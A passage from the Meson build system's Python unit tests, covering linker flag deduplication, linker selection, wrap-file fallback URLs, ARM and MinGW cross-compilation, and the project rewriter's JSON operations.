testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
linker = cc.linker
if not linker.export_dynamic_args(env):
raise unittest.SkipTest('Not applicable for linkers without --export-dynamic')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
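        # Count the maximum number of times the flag appears on any single line;
        # proper deduplication means it should appear at most once per link command.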
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
                # Assert that the library is only listed once on the line
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
nativefile = tempfile.NamedTemporaryFile(mode='w')
nativefile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'build_wrapper.py')))
nativefile.flush()
self.meson_native_file = nativefile.name
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir)
def test_identity_cross_env(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
env = {
'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"',
}
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
        # Test that the installed libraries work
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '68 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest('Could not find {}.'.format(check))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
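        # For each candidate environment variable (current and deprecated names),
        # set it and re-detect the compiler to verify the expected linker is chosen.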
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
if lang != 'rust' and comp.use_linker_args('bfd') == []:
raise unittest.SkipTest(
'Compiler {} does not support using alternative linkers'.format(comp.id))
self.assertEqual(comp.linker.id, expected)
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skip_if_not_language('rust')
def test_ld_environment_variable_rust(self):
self._check_ld('ld.gold', 'gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
@skip_if_not_language('objc')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
@skip_if_not_language('objcpp')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skip_if_not_language('fortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
@skip_if_not_language('d')
def test_ld_environment_variable_d(self):
# At least for me, ldc defaults to gold, and gdc defaults to bfd, so
# let's pick lld, which isn't the default for either (currently)
self._check_ld('ld.lld', 'lld', 'd', 'ld.lld')
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '74 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
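        # The wrap file points its primary URLs at an unreachable server, so the
        # file:// fallback URLs must be used for both the source archive and the patch.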
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = http://server.invalid/foo
source_fallback_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = http://server.invalid/foo
patch_fallback_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def test_no_rpath_for_static(self):
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
self.build()
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertIsNone(build_rpath)
def test_lookup_system_after_broken_fallback(self):
# Just to generate libfoo.pc so we can test system dependency lookup.
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir = self.privatedir
        # Write a test project where the first dependency() returns not-found
        # because the 'broken' subproject does not exist, but that should not
        # prevent the 2nd dependency() from being looked up on the system.
self.new_builddir()
with tempfile.TemporaryDirectory() as d:
with open(os.path.join(d, 'meson.build'), 'w') as f:
f.write(textwrap.dedent('''\
project('test')
dependency('notfound', fallback: 'broken', required: false)
dependency('libfoo', fallback: 'broken', required: true)
'''))
self.init(d, override_envvars={'PKG_CONFIG_LIBDIR': privatedir})
def test_as_link_whole(self):
testdir = os.path.join(self.unit_test_dir, '79 as link whole')
self.init(testdir)
with open(os.path.join(self.privatedir, 'bar1.pc')) as f:
content = f.read()
self.assertIn('-lfoo', content)
with open(os.path.join(self.privatedir, 'bar2.pc')) as f:
content = f.read()
self.assertNotIn('-lfoo', content)
class BaseLinuxCrossTests(BasePlatformTests):
# Don't pass --libdir when cross-compiling. We have tests that
# check whether meson auto-detects it correctly.
libdir = None
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.assertTrue(False, 'Option libdir not in introspect data.')
def test_cross_libdir_subproject(self):
# Guard against a regression where calling "subproject"
# would reset the value of libdir to its default value.
testdir = os.path.join(self.unit_test_dir, '78 subdir libdir')
self.init(testdir, extra_args=['--libdir=fuf'])
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'fuf')
return
self.assertTrue(False, 'Libdir specified on command line gets reset.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
        # When specifying a known name (python2 / python3), the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine,
# if it is not, or the python headers can't be found, the test
# will raise MESON_SKIP_TEST, we could check beforehand what version
# of python is available, but it's a bit of a chicken and egg situation,
# as that is the job of the module, so we just ask for forgiveness rather
# than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
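        # The rewriter prints its JSON result on stderr; an empty stderr means
        # there is nothing to report.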
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
    def test_target_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
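        # Sources should come back grouped by directory and sorted naturally
        # within each group (e.g. a2.c before a10.c).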
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
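                    # Booleans and numbers are written unquoted, lists as
                    # ['a', 'b', ...], and everything else as a quoted string.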
if isinstance(v, (bool, int, float)):
f.write("{}={}\n".format(k, v))
elif isinstance(v, list):
f.write("{}=[{}]\n".format(k, ', '.join(["'{}'".format(w) for w in v])))
else:
f.write("{}='{}'\n".format(k, v))
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
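            # Each keyword becomes a command-line flag that prints the canned
            # value and exits; any other arguments are forwarded to the wrapped binary.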
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
